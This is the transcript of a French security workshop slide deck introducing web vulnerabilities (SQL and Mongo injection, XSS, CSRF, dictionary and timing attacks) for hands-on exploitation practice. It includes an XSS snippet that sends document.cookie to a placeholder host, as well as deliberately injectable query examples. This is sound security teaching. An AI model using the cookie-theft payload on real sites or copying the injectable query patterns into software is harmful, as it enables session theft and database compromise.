Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sortez le Mr Robot qui est en vous !

Sortez le Mr Robot qui est en vous !

Un workshop qui vous permet de chercher, analyser et exploiter différentes failles de sécurité.

Par Mickael Jeanroy et Houssem BELHADJ AHMED

Houssem BELHADJ AHMED

April 21, 2017
Tweet

More Decks by Houssem BELHADJ AHMED

Other Decks in Technology

Transcript

  1. Workshop “Mr Robot” Mickael Jeanroy Houssem Belhadj Ahmed Développeur @mickaeljeanroy

    https://github.com/mjeanroy Développeur @7ouss3m https://github.com/houssemba
  2. Workshop “Mr Robot” hopwork Merci à @hopwork https://www.hopwork.fr Merci à

    @traefikproxy : @ludnadez & @emilevauge ! https://traefik.io
  3. Workshop “Mr Robot” Pourquoi ce workshop ? - 2005 :

    MySpace (XSS) - 2010 : Site apache.org (XSS) - 2011 : Sony (SQLInjection) - 2012 : Linkedin (?) - 2012 : Yahoo (SQLInjection) - 2015 : Site jeuxvideos.com (XSS) - Etc.
  4. Workshop “Mr Robot” Présentation de quelques failles Hint : Certaines

    seront présentes dans le workshop, d’autres non...
  5. Workshop “Mr Robot” Quelques failles : - SQLInjection - MongoInjection

    - XSS (Cross Site Scripting) - CSRF (Cross-Site Request Forgery) - Dictionnaire - Timing Attack - Etc.
  6. Workshop “Mr Robot” SQLInjection - Détournement d’une requête SQL -

    Risques principaux : bypass de login, dump de la base données Exemple : SELECT id, nom FROM users WHERE login = ‘“ + login + “‘ “ AND password = ‘“ + password + “‘“
  7. Workshop “Mr Robot” Mongo Injection - Même principe qu’une SQLInjection

    - Détournement de la requête MongoDB Exemple : Users.findOne({ login: req.body.login, password: req.body.password });
  8. Workshop “Mr Robot” XSS (Cross Site Scripting) - Injection de

    code JavaScript - Risques principaux : vol de cookies, vol de tokens, usurpation d’identité Exemple : <script> var src = "http://domain.com/" + (document.cookie); new Image().src = src; </script>
  9. Workshop “Mr Robot” CSRF (Cross-Site Request Forgery) - Utilise les

    mécanismes d’authentification / de session (cookie). - Risques principaux : vol de données, usurpation d’identité Exemple : 1- Alice envoie un lien à Bob 2- Bob clique sur le lien qui l’amène sur banque.com : => Bob s’authentifie automatiquement grâce à son cookie 3- Le serveur effectue l’opération demandée par “Bob”
  10. Workshop “Mr Robot” Dictionary Attack - Idée : tester un

    champ de saisie à partir d’un ensemble de données connues comme étant souvent utilisée - Base de mots de passe : http://www.passwordrandom.com/most-popular-passwords Exemple :
  11. Workshop “Mr Robot” Timing Attack - Idée : Analyse des

    temps d’exécution pour deviner les valeurs possibles - Risques principaux : bypass de login, découverte de données sensibles Exemple :
  12. Workshop “Mr Robot” Quelques astuces : - Testez les formulaire

    : https://github.com/minimaxir/big-list-of-naughty-strings - Comparaison de cas valides et de cas d’erreurs (code retours HTTP, messages d’erreurs, etc.) - Code retour 401 vs 403 vs 404 - Message : “Mot de passe invalide” vs “Identifiants invalides” - Stacktrace Java dans la réponse - Etc.
  13. Workshop “Mr Robot” Quelques astuces : - Utilisation des DevTools

    de votre navigateur pour inspecter les données stockées (cookies, local storage, session storage)
  14. Workshop “Mr Robot” Quelques astuces : - Inspection des échanges

    réseaux (headers HTTP, temps d’exécution, etc.).